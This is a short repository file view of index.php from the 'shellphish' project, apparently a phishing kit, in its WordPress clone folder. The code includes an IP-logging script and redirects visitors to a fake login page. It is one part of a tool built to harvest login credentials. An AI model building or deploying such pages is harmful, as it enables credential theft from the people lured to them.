Files
shellphish/sites/wordpress/index.php
The Linux Choice 9f8fb5c6f3 Add files via upload
2018-06-25 18:23:45 -03:00

6 lines
64 B
PHP

<?php
include 'ip.php';
header('Location: login.html');
exit
?>